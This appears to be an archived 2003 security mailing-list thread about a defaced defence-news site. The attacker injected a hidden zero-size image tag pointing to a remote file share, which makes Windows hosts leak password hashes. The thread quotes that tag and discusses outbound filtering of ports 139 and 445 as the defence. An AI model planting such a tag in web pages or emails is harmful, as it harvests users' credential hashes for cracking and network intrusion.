Hello,
What happens if you're in an Active Directory/Kerberos
environment? Will it revert to sending the hash for NTLM auth or will
it just try to obtain a ticket for the resource? Or, am I completely
barking up the wrong tree on this? :) I seem to remember that it will
revert, but was wondering if anyone knew for sure. Thanks in advance.
-Barry
Stark, Vernon L. wrote:
> A host that encounters content such as <img
>src=file://korean_ip_address/test.jpg height=0 width=0> simply tries to
>contact the single host korean_ip_address. It does not try to do a DDOS. If
>ports 139 and 445 are not blocked outbound, the impact is that the host will
>create a connection with the Korean host and attempt to authenticate. This
>authentication includes providing password hashes to the remote host.
>
> What we've seen is a news site that repeatedly gets defaced. The
>defacement consists of simply adding the content listed above. When users
>are browsing the web and encounter this news site, their hosts attempt to
>call Korea. The packets all have the same destination IP address (the
>Korean host) and their only intent is to establish a connection with the
>Korean host. There is no intent to do a DOS. So, blocking outbound TCP 139
>and 445 keeps your password hashes from being transmitted to Korea where
>they might be cracked and used for gaining access to your network. The
>content simply provides a way to harvest password hashes.
>
> By the way, I've also seen this content in an e-mail message. Yes,
>when the user opened the e-mail, his host started attempting to contact the
>IP address listed in the offending content.
>
>Vern
>
>-----Original Message-----
>From: Jack Lyons [mailto:jack.lyonsat_private]
>Sent: Tuesday, July 22, 2003 12:39 PM
>To: 'Stark, Vernon L.'; 'incidentsat_private'
>Subject: RE: Importance of outbound traffic filtering
>
>
>I block those ports and others outbound, but it would only stop DDOS attack
>against people who left those ports open inbound - correct?
>
>
>
>>-----Original Message-----
>>From: Stark, Vernon L. [mailto:Vern.Starkat_private]
>>Sent: Friday, July 18, 2003 10:13 AM
>>To: 'incidentsat_private'
>>Subject: Importance of outbound traffic filtering
>>
>> For the third time since May 5th, a site which provides news about
>>department of defense issues has apparently been defaced. The hack is
>>described in Ed Skoudis's excellent book entitled "Counter Hack" (pages
>>289-290). The hack we noticed today is a web page with content of the
>>form
>>
>><img src=file://korean_ip_address/test.jpg height=0 width=0>
>>
>> If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows
>>hosts will attempt to send password hashes to the remote host. Hosts may
>>attempt to contact the remote host on other ports (e.g. 80) as well. This
>>clearly illustrates the importance of outbound traffic filtering.
>>
>>Vern Stark, GCIA, GSEC
>>
>>JHU/APL
>>
>>--------------------------------------------------------------------------
>>--
>>Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
>>world's premier technical IT security event! 10 tracks, 15 training
>>sessions,
>>1,800 delegates from 30 nations including all of the top experts, from
>>CSO's to
>>"underground" security specialists. See for yourself what the buzz is
>>about!
>>Early-bird registration ends July 3. This event will sell out.
>>www.blackhat.com
>>--------------------------------------------------------------------------
>>--
>>
>>
>
>
>This email and its contents may be confidential. If it is and you are not
>the intended recipient, please do not disclose or use the information within
>this email or its attachments. If you have received this email in error,
>please delete it immediately. Thank you.
>
>
>---------------------------------------------------------------------------
>----------------------------------------------------------------------------
>
>
>
>
>
---------------------------------------------------------------------------
----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Jul 31 2003 - 07:45:38 PDT
